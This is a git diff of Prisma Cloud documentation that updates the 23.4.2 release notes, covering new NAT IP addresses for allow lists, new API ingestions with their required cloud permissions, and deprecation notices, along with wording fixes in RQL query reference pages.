|*S3 Flow Logs with Hourly Partition* @@ -54,19 +76,170 @@ If you have any questions, contact your Prisma Cloud Customer Success Representa https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/connect-your-cloud-platform-to-prisma-cloud/onboard-your-aws-account/enable-flow-logs-for-amazon-s3[Configure Flow Logs] with the hourly partition and enable the additional fields required. - |*Update for Google Compute APIs* -//RLP-95461 +//RLP-47280 -|Beginning with the 23.4.1 release, Prisma Cloud will provide global region support, as well as a backend update to the resource ID for *gcloud-compute-url-maps*, *gcloud-compute-target-http-proxies*, and *gcloud-compute-target-https-proxies* APIs. As a result, all resources for these APIs will be deleted and then regenerated on the management console. +|Beginning in the 23.4.2 release, Prisma Cloud will provide global region support, as well as a backend update to the resource ID for *gcloud-compute-internal-lb-backend-service* API. As a result, all resources for these APIs will be deleted and then regenerated on the management console. Existing alerts corresponding to these resources will be resolved as Resource_Updated, and new alerts will be generated against policy violations if any. -*Impact*—You may notice a reduced alert count. However, once the resources for *gcloud-compute-url-maps*, *gcloud-compute-target-http-proxies*, and *gcloud-compute-target-https-proxies* resume ingesting data, the alert count will return to the original numbers. +*Impact*—You may notice a reduced alert count. However, once the resources for *gcloud-compute-internal-lb-backend-service* resume ingesting data, the alert count will return to the original numbers. + + +|=== + + +[#add-ip-address] +=== Addition of New IP Addresses +//RLP-96660, TLDO-466 +Beginning with the 23.4.2 release, Prisma Cloud will add the following NAT IP addresses to the existing list. 
Make sure to review the list and update the IP addresses in your allow lists. + +[cols="50%a,50%a"] +|=== +|*Prisma Cloud URL (AWS Region)* +|*Source IP Address to Allow* + + +|http://app.prismacloud.io/[app.prismacloud.io] + +us-east-1 (N.Virginia) + +|3.210.133.47 + +34.235.13.250 + +44.207.239.90 + +|http://app2.prismacloud.io/[app2.prismacloud.io] + +us-east-2 (Ohio) + +|18.116.185.157 + +18.223.154.151 + +3.136.199.10 + +|http://app3.prismacloud.io/[app3.prismacloud.io] + +us-west-2 (Oregon) + +|44.233.39.196 + +52.12.85.11 + +54.70.207.107 + +|http://app4.prismacloud.io/[app4.prismacloud.io] + +us-west-1 (N.California) + +|184.72.47.199 + +54.193.251.180 + +54.241.31.130 + +*Compute SaaS Console Region (GCP)* +New egress IPs (from console to the internet) in us-west1 (Oregon) + +* 35.230.69.118 +* 34.82.138.152 + +|http://app.ind.prismacloud.io/[app.ind.prismacloud.io] + +(India) + +|13.126.142.108 + +3.108.78.191 + +65.0.233.228 + +|http://app.sg.prismacloud.io/[app.sg.prismacloud.io] + +ap-southeast-1 (Singapore) + +|13.251.200.128 + +18.136.72.0 + +18.139.106.36 + +|http://app.anz.prismacloud.io/[app.anz.prismacloud.io] + +ap-southeast-2 (Sydney) + +|13.55.65.214 + +3.104.84.8 + +54.66.162.181 + +|http://app.jp.prismacloud.io/[app.jp.prismacloud.io] + +ap-northeast-1 (Tokyo) + +|18.178.170.193 + +18.182.113.156 + +3.114.23.157 + +|http://app.ca.prismacloud.io/[app.ca.prismacloud.io] + +ca-central-1 (Canada - Central) + +|3.97.19.141 + +3.97.195.202 + +3.97.251.220 + +|http://app.eu.prismacloud.io/[app.eu.prismacloud.io] + +eu-central-1 (Frankfurt) + +|18.184.42.114 + +3.73.209.143 + +3.75.34.63 + +|http://app2.eu.prismacloud.io/[app2.eu.prismacloud.io] + +eu-west-1 (Ireland) + +|52.208.88.215 + +54.170.230.172 + +54.72.135.50 + +|http://app.uk.prismacloud.io/[app.uk.prismacloud.io] + +eu-west-2 (London) + +|13.42.159.205 + +3.8.248.150 + +35.176.28.215 + +|http://app.fr.prismacloud.io/[app.fr.prismacloud.io] + +eu-west-3 (Paris) + +|13.36.26.86 + 
+13.37.138.49 + +13.37.20.19 |=== + [#new-policies] === New Policies @@ -85,7 +258,7 @@ The folder contains RQL based Config, Network, and Audit Event policies in JSON + The *Master* branch represents the current Prisma Cloud release that is generally available. You can switch to a previous release or the next release branch, to review the policies that were published previously or are planned for the upcoming release. + -Because Prisma Cloud typically has 2 releases in a month, the release naming convention in GitHub is PCS-... For example, PCS-23.4.1. +Because Prisma Cloud typically has 2 releases in a month, the release naming convention in GitHub is PCS-... For example, PCS-23.4.2. . Review the updates. + @@ -97,81 +270,272 @@ Use the *policies* folder to review the JSON for each policy that is added or up [#policy-updates] === Policy Updates -No Policy Updates for 23.4.1. +No Policy Updates for 23.4.2. [#api-ingestions] === API Ingestions -The following API ingestion updates are planned for Prisma Cloud in 23.4.1: +The following API ingestion updates are planned for Prisma Cloud in 23.4.2: [cols="50%a,50%a"] |=== |SERVICE |API DETAILS -|*Azure Virtual WAN* -//RLP-95728 +|*Amazon Firewall Manager* +//RLP-97013 +|*aws-fms-admin-account* + +Additional permission required: + +* screen:[fms:GetAdminAccount] + +You must manually add the permission or update the CFT template to enable it. + +|*Amazon Firewall Manager* +//RLP-97037 +|*aws-fms-compliance-status* + +Additional permissions required: + +* screen:[fms:ListPolicies] +* screen:[fms:ListComplianceStatus] + +The Security Audit role includes the permissions. -|*azure-vpn-server-configurations* + +|*Amazon Firewall Manager* +//RLP-95502 +|*aws-fms-policy* + +Additional permissions required: + +* screen:[fms:GetAdminAccount] +* screen:[fms:ListPolicies] +* screen:[fms:GetPolicy] + +The Security Audit role only includes the screen:[fms:ListPolicies] permission.
+ +[NOTE] +==== +You must manually add the permissions or update the CFT template to enable screen:[fms:GetPolicy] and screen:[fms:GetAdminAccount]. +==== + +|tt:[Update] *Amazon RDS* +//RLP-97823 +|*aws-rds-db-cluster* + +This API is updated to include a new field screen:[dBclusterParameterGroupArn] in the resource JSON. + + +|*Azure CDN* +//RLP-96258 +|*azure-frontdoor-standardpremium-origin-groups* + +Additional permissions required: + +* screen:[Microsoft.Cdn/profiles/read] +* screen:[Microsoft.Cdn/profiles/origingroups/read] + +The Reader role includes the permissions. + +|*Azure CDN* +//RLP-96252 +|*azure-frontdoor-standardpremium-security-policies* + +Additional permissions required: + +* screen:[Microsoft.Cdn/profiles/read] +* screen:[Microsoft.Cdn/profiles/securitypolicies/read] + +The Reader role includes the permissions. + +|tt:[Update] *Azure Event Hubs* +//RLP-93890 + +|*azure-event-hub-namespace* + +This API is updated to include the following new fields in the resource JSON: + +* screen:[MinimumTlsVersion] +* screen:[disableLocalAuth] + +|tt:[Update] *Azure Service Bus* +//RLP-93891 + +|*azure-service-bus-namespace* + +This API is updated to include a new field screen:[MinimumTlsVersion] in the resource JSON. + +|*Google Cloud Function* +//RLP-96702 +|*gcloud-cloud-function-v2* + +Additional permissions required: + +* screen:[cloudfunctions.locations.list] +* screen:[cloudfunctions.functions.list] +* screen:[cloudfunctions.functions.getIamPolicy] + +The Viewer role includes the permissions. + + +|*Google Cloud Memorystore for Memcached* +//RLP-96697 +|*gcloud-memorystore-memcached-instance* + +Additional permissions required: + +* screen:[memcache.locations.list] +* screen:[memcache.instances.list] + +The Viewer role includes the permissions.
+ + +|*OCI Database* +//RLP-95386 +|*oci-database-autonomous-database* + +Additional permission required: + +* screen:[AUTONOMOUS_DATABASE_INSPECT] + +You must download and execute the Terraform template from the console to enable the permission. + + +|*OCI Database* +//RLP-95388 +|*oci-database-db-home* Additional permission required: -* screen:[Microsoft.Network/vpnServerConfigurations/read] +* screen:[DB_HOME_INSPECT] + +You must download and execute the Terraform template from the console to enable the permission. + +|*OCI Database* +//RLP-95399 +|*oci-database-db-home-patch* -The Reader role includes the permission. +Additional permission required: + +* screen:[DB_HOME_INSPECT] -|*Azure Virtual WAN* -//RLP-95723 +You must download and execute the Terraform template from the console to enable the permission. -|*azure-p2s-vpn-gateway* +|*OCI Database* +//RLP-95402 +|*oci-database-db-system-patch* Additional permission required: -* screen:[Microsoft.Network/p2sVpnGateways/read] +* screen:[DB_SYSTEM_INSPECT] + +You must download and execute the Terraform template from the console to enable the permission. -The Reader role includes the permission. +|*OCI DataLabeling* +//RLP-91477 +|*oci-datalabeling-dataset* +Additional permissions required: + +* screen:[DATA_LABELING_DATASET_INSPECT] +* screen:[DATA_LABELING_DATASET_READ] -|*Google Certificate Authority Service* -//RLP-95648 +You must download and execute the Terraform template from the console to enable the permissions. -|*gcloud-certificate-authority-certificate-template* +|*OCI File Storage* +//RLP-91466 +|*oci-file-storage-mount-target* Additional permissions required: -* screen:[privateca.locations.list] -* screen:[privateca.certificateTemplates.list] -* screen:[privateca.certificateTemplates.getIamPolicy] +* screen:[COMPARTMENT_INSPECT] +* screen:[MOUNT_TARGET_INSPECT] +* screen:[MOUNT_TARGET_READ] -The Viewer role includes the permissions. 
+You must download and execute the Terraform template from the console to enable the permissions. +|*OCI JMS* +//RLP-91469 +|*oci-jms-fleet* -|*Google Traffic Director Network Service* -//RLP-95651 +Additional permissions required: + +* screen:[FLEET_INSPECT] +* screen:[FLEET_READ] + +You must download and execute the Terraform template from the console to enable the permissions. -|*gcloud-traffic-director-network-service-gateway* + +|*OCI Service Mesh* +//RLP-93739 +|*oci-service-mesh-access-policy* Additional permissions required: -* screen:[networkservices.locations.list] -* screen:[networkservices.gateways.list] +* screen:[MESH_ACCESS_POLICY_LIST] +* screen:[MESH_ACCESS_POLICY_READ] -The Viewer role includes the permissions. +You must download and execute the Terraform template from the console to enable the permissions. +|*OCI Service Mesh* +//RLP-93736 +|*oci-service-mesh-virtual-deployment* -|*Google Traffic Director Network Service* -//RLP-95650 +Additional permissions required: -|*gcloud-traffic-director-network-service-mesh* +* screen:[MESH_VIRTUAL_DEPLOYMENT_LIST] +* screen:[MESH_VIRTUAL_DEPLOYMENT_READ] +* screen:[MESH_VIRTUAL_DEPLOYMENT_PROXY_CONFIG_READ] +* screen:[MESH_PROXY_DETAILS_READ] + +You must download and execute the Terraform template from the console to enable the permissions. + +|*OCI Service Mesh* +//RLP-93733 +|*oci-service-mesh-meshes* Additional permissions required: -* screen:[networkservices.locations.list] -* screen:[networkservices.meshes.list] -* screen:[networkservices.meshes.getIamPolicy] +* screen:[SERVICE_MESH_LIST] +* screen:[SERVICE_MESH_READ] -The Viewer role includes the permissions. +You must download and execute the Terraform template from the console to enable the permissions.
+ +|*OCI Speech* +//RLP-92726 +|*oci-speech-transcription-job* + +Additional permissions required: + +* screen:[AI_SERVICE_SPEECH_TRANSCRIPTION_JOB_INSPECT] +* screen:[AI_SERVICE_SPEECH_TRANSCRIPTION_JOB_READ] + +You must download and execute the Terraform template from the console to enable the permissions. + +|*OCI Vision* +//RLP-92722 +|*oci-vision-model* + +Additional permissions required: + +* screen:[AI_SERVICE_VISION_MODEL_INSPECT] +* screen:[AI_SERVICE_VISION_MODEL_READ] + +You must download and execute the Terraform template from the console to enable the permissions. + +|*OCI Vision* +//RLP-92718 +|*oci-vision-project* + +Additional permissions required: + +* screen:[AI_SERVICE_VISION_PROJECT_INSPECT] +* screen:[AI_SERVICE_VISION_PROJECT_READ] + +You must download and execute the Terraform template from the console to enable the permissions. |=== @@ -182,13 +546,9 @@ The Viewer role includes the permissions. |=== 2+|Deprecation Notice -|tt:[End of Support for AWS Classic EC2 Service] -//RLP-96041, Added in 23.3.2. -|The userinput:[aws-ec2-classic-instance] API is planned for deprecation at the end of April 2023. As AWS has announced the depreciation of the resource type, Prisma Cloud will no longer ingest the userinput:[aws-ec2-classic-instance] API. For more information, see https://aws.amazon.com/blogs/aws/ec2-classic-is-retiring-heres-how-to-prepare/[Retiring EC2-Classic Networking]. 
- - |tt:[Prisma Cloud Data Security v1, v2 APIs] -|In the 23.4.1 release, the following Prisma Cloud Data Security APIs (v1, v2) for AWS cloud account onboarding, data settings, data profiles, snippets, and data patterns will be deprecated and new APIs (v3) will be added: +//RLP-96733 +|In the 23.4.2 release, the following Prisma Cloud Data Security APIs (v1, v2) for AWS cloud account onboarding, data settings, data profiles, snippets, and data patterns will be deprecated and new APIs (v3) will be added: *Deprecating Cloud Accounts Endpoints* @@ -247,6 +607,11 @@ The Viewer role includes the permissions. * userinput:[POST /config/v3/dss-api/snippets/dssTenantId/{dssTenantId}] +|tt:[End of Support for AWS Classic EC2 Service] +//RLP-96041, Added in 23.3.2. +|The userinput:[aws-ec2-classic-instance] API is planned for deprecation at the end of April 2023. As AWS has announced the deprecation of the resource type, Prisma Cloud will no longer ingest the userinput:[aws-ec2-classic-instance] API. For more information, see https://aws.amazon.com/blogs/aws/ec2-classic-is-retiring-heres-how-to-prepare/[Retiring EC2-Classic Networking]. + + |tt:[Prisma Cloud CSPM REST API for Alerts] |Some Alert API request parameters and response object properties are now deprecated. diff --git a/cspm/rql-reference/rql-reference/config-query/config-query-attributes.adoc b/cspm/rql-reference/rql-reference/config-query/config-query-attributes.adoc index 0baf4266d..506447085 100644 --- a/cspm/rql-reference/rql-reference/config-query/config-query-attributes.adoc +++ b/cspm/rql-reference/rql-reference/config-query/config-query-attributes.adoc @@ -95,11 +95,11 @@ Use the userinput:[count] attribute for a tally of the number of resources of a * userinput:[finding.type, finding.severity, finding.source] + -Use the finding attributes to query for vulnerabilities on workloads—destination or source resources—that have one or more host-related security findings. 
Prisma Cloud ingests host vulnerability data from external sources, such as Qualys, Tenable.io, AWS Inspector and ingests host and IAM users security-related alerts from AWS GuardDuty, or Prisma Cloud https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin-compute/install/defender_types.html[Defenders] deployed on your hosts or containers. +Use the finding attributes to query for vulnerabilities on workloads—destination or source resources—that have one or more host-related security findings. Prisma Cloud ingests host vulnerability data from external sources, such as Qualys, Tenable.io, and Amazon Inspector, and ingests host and IAM user security-related alerts from Amazon GuardDuty or from Prisma Cloud https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin-compute/install/defender_types.html[Defenders] deployed on your hosts or containers. + [NOTE] ==== -To leverage userinput:[finding] attributes, you must either enable an integration with the host vulnerability provider such as AWS GuardDuty or have installed Prisma Cloud Defenders in your environment. +To leverage userinput:[finding] attributes, you must either enable an integration with a host vulnerability provider, such as Amazon GuardDuty, or install Prisma Cloud Defenders in your environment. ==== + image::hostfinding-type-hostfinding-severity-query-1.png[scale=30] @@ -123,7 +123,7 @@ screen:[config from cloud.resource where finding.source = 'AWS Guard Duty' AND f ** *AWS GuardDuty*—Fetches all resources which have one or more findings reported by AWS GuardDuty. + -For AWS GuardDuty, the finding.type can be IAM or host—AWS GuardDuty IAM or AWS GuardDuty Host. +For Amazon GuardDuty, the finding.type can be IAM or host—AWS GuardDuty IAM or AWS GuardDuty Host. 
* userinput:[finding.name] + diff --git a/cspm/rql-reference/rql-reference/network-query/network-flow-log-query-attributes.adoc b/cspm/rql-reference/rql-reference/network-query/network-flow-log-query-attributes.adoc index 694d77975..3f57b36d2 100644 --- a/cspm/rql-reference/rql-reference/network-query/network-flow-log-query-attributes.adoc +++ b/cspm/rql-reference/rql-reference/network-query/network-flow-log-query-attributes.adoc @@ -90,7 +90,7 @@ image::dest-resource-in-resource-query-example-1.png[scale=40] * userinput:[finding.severity, finding.type, finding.source] + -Use finding attributes to query for vulnerabilities on destination or source resources that have one or more host-related security findings. Prisma Cloud ingests host vulnerability data from Prisma Cloud Defenders deployed on your cloud environments, and external sources such as Qualys, Tenable.io, AWS Inspector, and host and IAM-security related alerts from AWS GuardDuty. +Use finding attributes to query for vulnerabilities on destination or source resources that have one or more host-related security findings. Prisma Cloud ingests host vulnerability data from Prisma Cloud Defenders deployed on your cloud environments and from external sources such as Qualys, Tenable.io, and Amazon Inspector, as well as host and IAM security-related alerts from Amazon GuardDuty. + [NOTE] ====